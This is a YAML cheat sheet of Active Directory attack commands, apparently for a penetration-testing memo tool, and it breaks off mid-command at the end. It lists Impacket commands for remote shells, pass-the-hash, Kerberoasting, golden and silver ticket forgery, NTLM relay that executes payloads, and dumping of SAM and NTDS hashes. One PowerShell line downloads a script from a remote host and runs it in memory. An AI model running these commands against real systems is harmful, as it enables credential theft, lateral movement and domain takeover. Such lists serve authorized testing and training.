title: Commands for Fast Memo Shell from Arsenal
commands:
  - cmd: psexec.py <domain>/<user>:<password>@<target>
    lang: sh
    tags: impacket, windows, exec
    desc: PSEXEC with username and password
  - cmd: psexec.py -hashes <lm_hash>:<nt_hash> <domain>/<user>@<target>
    lang: sh
    tags: impacket, windows, exec
    desc: PSEXEC with pass the hash (PtH); if only the NT hash is known, use the empty-LM value aad3b435b51404eeaad3b435b51404ee for the LM half
  - cmd: export KRB5CCNAME=<ticket.ccache>; psexec.py -dc-ip <dc_ip> -target-ip <target_ip> -no-pass -k <domain>/<user>@<target_hostname>
    lang: sh
    tags: impacket, windows, exec
    desc: PSEXEC with Kerberos (ticket read from the ccache in KRB5CCNAME; the target must be the hostname matching the service ticket SPN, not an IP, hence -target-ip)
  - cmd: smbexec.py <domain>/<user>:<password>@<target>
    lang: sh
    tags: impacket, windows, exec
    desc: SMBEXEC with username and password (no binary dropped, commands run through a temporary service)
  - cmd: smbexec.py -hashes <lm_hash>:<nt_hash> <domain>/<user>@<target>
    lang: sh
    tags: impacket, windows, exec
    desc: SMBEXEC with pass the hash (PtH)
  - cmd: export KRB5CCNAME=<ticket.ccache>; smbexec.py -dc-ip <dc_ip> -target-ip <target_ip> -no-pass -k <domain>/<user>@<target_hostname>
    lang: sh
    tags: impacket, windows, exec
    desc: SMBEXEC with Kerberos (same hostname-vs-IP caveat as psexec)
  - cmd: wmiexec.py <domain>/<user>:<password>@<target>
    lang: sh
    tags: impacket, windows, exec
    desc: wmiexec - semi-interactive shell over WMI (DCOM), output retrieved through ADMIN$
  - cmd: wmiexec.py -hashes <lm_hash>:<nt_hash> <domain>/<user>@<target>
    lang: sh
    tags: impacket, windows, exec
    desc: wmiexec with pass the hash (PtH)
  - cmd: atexec.py <domain>/<user>:<password>@<target> "<command>"
    lang: sh
    tags: impacket, windows, exec
    desc: atexec - execute a single command through the Task Scheduler service
  - cmd: atexec.py -hashes <lm_hash>:<nt_hash> <domain>/<user>@<target> "<command>"
    lang: sh
    tags: impacket, windows, exec
    desc: atexec with pass the hash (PtH)
  - cmd: smbclient.py <domain>/<user>:<password>@<target>
    lang: sh
    tags: impacket, windows, exec
    desc: smbclient - interactive SMB client against the target (shares, get, put)
  - cmd: GetNPUsers.py <domain>/<user> -no-pass -request -format hashcat
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: GetNPUsers - request the AS-REP for one user without a password (ASREPRoasting), output in hashcat format
  - cmd: GetNPUsers.py -dc-ip <dc_ip> <domain>/ -usersfile <users_file> -format hashcat
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: GetNPUsers - for each user in the file, try to obtain an AS-REP; only accounts with 'Do not require Kerberos preauthentication' set will answer (ASREPRoasting)
  - cmd: GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>:<password>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: GetUserSPNs - find Service Principal Names bound to user accounts and request their TGS for offline cracking (Kerberoasting)
  - cmd: goldenPac.py -dc-ip <dc_ip> <domain>/<user>:'<password>'@<target>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: MS14-068 - goldenPac, forges a PAC on an unpatched DC and opens a shell on the target
  - cmd: ticketer.py -nthash <krbtgt_nt_hash> -domain-sid <domain_sid> -domain <domain> <user>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: Ticketer (golden ticket) - forge a TGT with the krbtgt NT hash, written as <user>.ccache; convert to kirbi with ticketConverter.py if needed
  - cmd: ticketer.py -nthash <service_nt_hash> -domain-sid <domain_sid> -domain <domain> -spn <spn> <user>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: Ticketer (silver ticket) - forge a TGS for <spn> with the service account NT hash, written as <user>.ccache
  - cmd: ticketConverter.py <input.kirbi> <output.ccache>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: TicketConverter - convert between kirbi (mimikatz, Rubeus) and ccache (impacket); the direction is inferred from the input file
  - cmd: getST.py -spn cifs/<target_hostname> <domain>/<account>\$ -impersonate <user>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: getST - S4U2self/S4U2proxy, obtain a service ticket for <spn> as the impersonated user through a delegation-capable account (constrained delegation or RBCD abuse); load it with KRB5CCNAME
  - cmd: getTGT.py -dc-ip <dc_ip> -hashes <lm_hash>:<nt_hash> <domain>/<user>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: getTGT - request a TGT with a password, NT hash or AES key and save it as <user>.ccache (export KRB5CCNAME to use it)
  - cmd: GetADUsers.py -all <domain>/<user>:<password> -dc-ip <dc_ip>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: GetADUsers - list the domain users with their email address, password last set and last logon
  - cmd: samrdump.py <domain>/<user>:<password>@<target>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: samrdump - enumerate accounts, shares, etc. through SAMR (remote query of the Security Account Manager)
  - cmd: secretsdump.py '<domain>/<user>:<password>'@<target>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: secretsdump - remote dump of SAM, LSA secrets, cached credentials and, on a DC, NTDS
  - cmd: secretsdump.py -system <SYSTEM.hive> -sam <SAM.hive> LOCAL
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: secretsdump local dump - extract hashes from an exported SAM hive (SYSTEM is needed for the boot key)
  - cmd: secretsdump.py -ntds <ntds.dit> -system <SYSTEM.hive> LOCAL -outputfile <prefix>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: secretsdump local dump - extract hashes from a copied ntds.dit, written to <prefix>.ntds
  - cmd: secretsdump.py <domain>/<dc_hostname>\$@<dc_ip> -no-pass -just-dc-user "Administrator"
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: secretsdump - authenticate as the DC machine account with an empty password (-no-pass) and dump only the Administrator account
  - cmd: secretsdump.py -just-dc-ntlm -outputfile <prefix> <domain>/<user>:<password>@<dc>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: secretsdump - remote NTDS extract, NTLM hashes only (DCSync through DRSUAPI, needs replication rights)
  - cmd: secretsdump.py -just-dc -pwd-last-set -user-status -outputfile <prefix> <domain>/<user>:<password>@<dc>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: secretsdump - remote NTDS extract with Kerberos keys plus password-last-set and enabled/disabled status per user
  - cmd: smbserver.py <share_name> <local_path>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: smbserver - share a local folder over SMB (add -smb2support for current Windows clients)
  - cmd: smbserver.py -username <user> -password <password> <share_name> <local_path>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: smbserver - share a local folder over SMB with authentication
  - cmd: ntlmrelayx.py -tf <targets_file> -smb2support -e <payload.exe>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: ntlmrelay - relay incoming NTLM authentications to the targets and execute the payload on each host where the relay succeeds
  - cmd: ntlmrelayx.py -tf <targets_file> -socks -smb2support
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: ntlmrelay - keep relayed sessions open behind a SOCKS proxy (use with proxychains) instead of running a one-shot action
  - cmd: ntlmrelayx.py -tf <targets_file> -smb2support
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: ntlmrelay - relay and dump the SAM of each target (default action)
  - cmd: ntlmrelayx.py -6 -wh <wpad_host> -t smb://<target> -l /tmp -socks -debug
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: ntlmrelay - for use with mitm6 (IPv6, serves WPAD), relay to the target
  - cmd: ntlmrelayx.py -t ldaps://<dc> -wh <wpad_host> --delegate-access
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: ntlmrelay - for use with mitm6, relay a machine account to LDAPS and configure resource-based constrained delegation to a new computer account
  - cmd: lookupsid.py <domain>/<user>:<password>@<target>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: lookupsid - enumerate users and groups by brute-forcing RIDs through LSARPC
  - cmd: reg.py <domain>/<user>:<password>@<target> query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: reg - query the registry remotely (-s recurses into subkeys)
  - cmd: rpcdump.py <domain>/<user>:<password>@<target>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: rpcdump - list RPC endpoints registered on the target
  - cmd: services.py <domain>/<user>:<password>@<target> <action>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: services.py - manage services remotely (actions include start, stop, delete, status, config, list, create, change)
  - cmd: getArch.py -target <target>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: getArch - find the target architecture (64 or 32 bits) without authentication
  - cmd: netview.py <domain>/<user> -target <target> -users <users_file>
    lang: sh
    tags: impacket, windows, kerberos, 88
    desc: netview - enumerate shares, sessions and logged-on users; needs working DNS for the domain
  - cmd: python3 scshell.py -service-name <service> -hashes <lm_hash>:<nt_hash> <domain>/<user>@<target>
    lang: sh
    tags: SCShell, psexec, stealthy, DCERPC
    desc: SCShell - stealthier psexec, changes the binary path of an existing service over DCERPC instead of dropping a file
  - cmd: neo4j start
    lang: bash
    tags: bloodhound, Active directory enumeration
    desc: start the neo4j server
  - cmd: bloodhound
    lang: bash
    tags: bloodhound, Active directory enumeration
    desc: start the BloodHound GUI
  - cmd: bloodhound-python -d <domain> -u <user> -p <password> -c all
    lang: bash
    tags: bloodhound, Active directory enumeration
    desc: bloodhound - collect data
  - cmd: bloodhound-python -d <domain> -u <user> -p <password> -gc <gc_host> -dc <dc_host> -c all
    lang: bash
    tags: bloodhound, Active directory enumeration
    desc: bloodhound - collect data, global catalog and DC given explicitly (when DNS resolution fails)
  - cmd: import-module sharphound.ps1; invoke-bloodhound -collectionmethod all -domain <domain>
    lang: ps1
    tags: bloodhound, Active directory enumeration
    desc: sharphound - collect BloodHound data
  - cmd: IEX (new-object system.net.webclient).downloadstring('http://<ip>/SharpHound.ps1'); Invoke-BloodHound -CollectionMethod All -Domain <domain>
    lang: ps1
    tags: bloodhound, Active directory enumeration
    desc: sharphound - download and execute in memory, then collect (the script must be loaded with IEX before Invoke-BloodHound exists)
  - cmd: cypheroth -u <neo4j_user> -p <neo4j_password> -d <domain>
    lang: bash
    tags: bloodhound, Active directory enumeration
    desc: cypheroth - run a batch of Cypher queries against the BloodHound database
  - cmd: aclpwn -f <from_computer> -ft computer -d <domain> -dry
    lang: sh
    tags: bloodhound, Active directory enumeration
    desc: aclpwn - compute an ACL abuse path from a computer to the domain, dry run only
  - cmd: certipy find -u <user>@<domain> -p '<password>' -dc-ip <dc_ip>
    lang: sh
    tags: adcs, certificate, pki, windows, Active directory, template, shadow credential
    desc: certipy - enumerate CAs and certificate templates (add -vulnerable to keep only misconfigured ones)
  - cmd: certipy req -u <user>@<domain> -p '<password>' -target <ca_host> -template